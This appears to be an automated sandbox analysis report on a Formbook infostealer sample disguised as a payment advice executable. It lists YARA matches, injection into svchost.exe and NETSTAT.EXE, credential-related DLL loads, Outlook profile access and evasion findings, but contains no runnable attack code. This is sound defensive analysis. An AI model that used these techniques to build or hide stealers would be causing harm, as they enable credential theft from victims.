            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039D9C326_2_039D9C32
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_030F1C006_2_030F1C00
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_030ECB006_2_030ECB00
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_030ECAFA6_2_030ECAFA
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_030ECD206_2_030ECD20
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_030EADA06_2_030EADA0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_030F52C06_2_030F52C0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_030F34906_2_030F3490
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0310B8E06_2_0310B8E0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0370E3F46_2_0370E3F4
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0370E2D86_2_0370E2D8
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0370D7F86_2_0370D7F8
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0370E78C6_2_0370E78C
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0370E55B6_2_0370E55B
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0370CA936_2_0370CA93
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 039DF290 appears 103 times
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 03995130 appears 58 times
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 039CEA12 appears 86 times
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 039A7E54 appears 107 times
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 0394B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03775130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03787E54 appears 99 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0372B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 037BF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 037AEA12 appears 86 times
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: String function: 00445975 appears 65 times
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: String function: 0041171A appears 37 times
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: String function: 0041718C appears 44 times
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: String function: 0040E6D0 appears 35 times
            Source: PAYMENT ADVISE#9879058.exe, 00000000.00000003.1735268118.00000000048ED000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PAYMENT ADVISE#9879058.exe
            Source: PAYMENT ADVISE#9879058.exe, 00000000.00000003.1736513404.0000000004743000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PAYMENT ADVISE#9879058.exe
            Source: PAYMENT ADVISE#9879058.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.2959379992.00000000011A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2342184824.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.2958344133.00000000030E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.2959484035.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.2959545540.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2341550139.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2342246132.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2959632438.0000000002E80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@5/4
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_0044AF5C GetLastError,FormatMessageW,0_2_0044AF5C
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464422
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004364AA
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_0045D517 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D517
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_0043701F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle,0_2_0043701F
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_0047A999 OleInitialize,CLSIDFromProgID,CoCreateInstance,CoInitializeSecurity,_memset,_wcslen,_memset,CoCreateInstanceEx,CoSetProxyBlanket,0_2_0047A999
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_0043614F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043614F
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeFile created: C:\Users\user\AppData\Local\Temp\toggingJump to behavior
            Source: PAYMENT ADVISE#9879058.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: NETSTAT.EXE, 00000006.00000002.2958501115.0000000003204000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000006.00000003.2574850951.00000000031E3000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000006.00000003.2574967839.0000000003204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: PAYMENT ADVISE#9879058.exeReversingLabs: Detection: 26%
            Source: PAYMENT ADVISE#9879058.exeVirustotal: Detection: 28%
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeFile read: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe "C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe"
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe"
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"
            Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe"Jump to behavior
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"Jump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: snmpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: PAYMENT ADVISE#9879058.exeStatic file information: File size 1352983 > 1048576
            Source: Binary string: netstat.pdbGCTL source: svchost.exe, 00000001.00000003.2310699924.000000000301A000.00000004.00000020.00020000.00000000.sdmp, eYlgnnKYnAjqSS.exe, 00000005.00000002.2958989075.00000000011F8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netstat.pdb source: svchost.exe, 00000001.00000003.2310699924.000000000301A000.00000004.00000020.00020000.00000000.sdmp, eYlgnnKYnAjqSS.exe, 00000005.00000002.2958989075.00000000011F8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: eYlgnnKYnAjqSS.exe, 00000005.00000000.2255485457.00000000002EE000.00000002.00000001.01000000.00000005.sdmp, eYlgnnKYnAjqSS.exe, 00000007.00000002.2958341376.00000000002EE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: PAYMENT ADVISE#9879058.exe, 00000000.00000003.1734554493.0000000004620000.00000004.00001000.00020000.00000000.sdmp, PAYMENT ADVISE#9879058.exe, 00000000.00000003.1734731744.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2341839749.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2236283658.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2238093908.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2341839749.0000000003700000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000006.00000003.2343943133.000000000376B000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000006.00000003.2341951806.00000000035BB000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000006.00000002.2959757865.0000000003920000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000006.00000002.2959757865.0000000003ABE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PAYMENT ADVISE#9879058.exe, 00000000.00000003.1734554493.0000000004620000.00000004.00001000.00020000.00000000.sdmp, PAYMENT ADVISE#9879058.exe, 00000000.00000003.1734731744.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2341839749.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2236283658.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2238093908.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2341839749.0000000003700000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000006.00000003.2343943133.000000000376B000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000006.00000003.2341951806.00000000035BB000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000006.00000002.2959757865.0000000003920000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000006.00000002.2959757865.0000000003ABE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: NETSTAT.EXE, 00000006.00000002.2960171619.0000000003F4C000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 00000006.00000002.2958501115.000000000317E000.00000004.00000020.00020000.00000000.sdmp, eYlgnnKYnAjqSS.exe, 00000007.00000000.2409776057.000000000305C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2687690315.000000001A4AC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: NETSTAT.EXE, 00000006.00000002.2960171619.0000000003F4C000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 00000006.00000002.2958501115.000000000317E000.00000004.00000020.00020000.00000000.sdmp, eYlgnnKYnAjqSS.exe, 00000007.00000000.2409776057.000000000305C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2687690315.000000001A4AC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,0_2_0040EB70
            Source: PAYMENT ADVISE#9879058.exeStatic PE information: real checksum: 0xa2135 should be: 0x1569d5
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_004171D1 push ecx; ret 0_2_004171E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041F132 push esp; ret 1_2_0041F13C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D9CD push edx; iretd 1_2_0040D99E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D99C push edx; iretd 1_2_0040D99E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041EB5B push FFFFFFC4h; retf 1_2_0041EB87
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041EB63 push FFFFFFC4h; retf 1_2_0041EB87
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D32A push es; ret 1_2_0040D335
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004193F1 push ebp; iretd 1_2_004193F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414C73 push ss; iretd 1_2_00414C85
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042D553 push ss; retf 1_2_0042D683
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00411D36 push C93F5ECDh; ret 1_2_00411D50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414613 push ss; iretd 1_2_00414625
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041463B push edi; retf 1_2_0041464A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403750 push eax; ret 1_2_00403752
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370225F pushad ; ret 1_2_037027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037027FA pushad ; ret 1_2_037027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037309AD push ecx; mov dword ptr [esp], ecx1_2_037309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370283D push eax; iretd 1_2_03702858
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0392225F pushad ; ret 6_2_039227F9
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039227FA pushad ; ret 6_2_039227F9
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039509AD push ecx; mov dword ptr [esp], ecx6_2_039509B6
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0392283D push eax; iretd 6_2_03922858
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03921368 push eax; iretd 6_2_03921369
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_030EE5E3 push C93F5ECDh; ret 6_2_030EE5FD
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_031017AE push eax; iretd 6_2_031017B3
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_030F1520 push ss; iretd 6_2_030F1532
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_030FB408 push FFFFFFC4h; retf 6_2_030FB434
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_030FB410 push FFFFFFC4h; retf 6_2_030FB434
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_030FDA7B push esi; iretd 6_2_030FDA7C
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_030FB9DF push esp; ret 6_2_030FB9E9
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03109E00 push ss; retf 6_2_03109F30
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_004772DE
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004375B0
            Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Contains functionality to detect sleep reduction / modifications
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_004440780_2_00444078
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeAPI/Special instruction interceptor: Address: 3FAAA84
            Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220D544
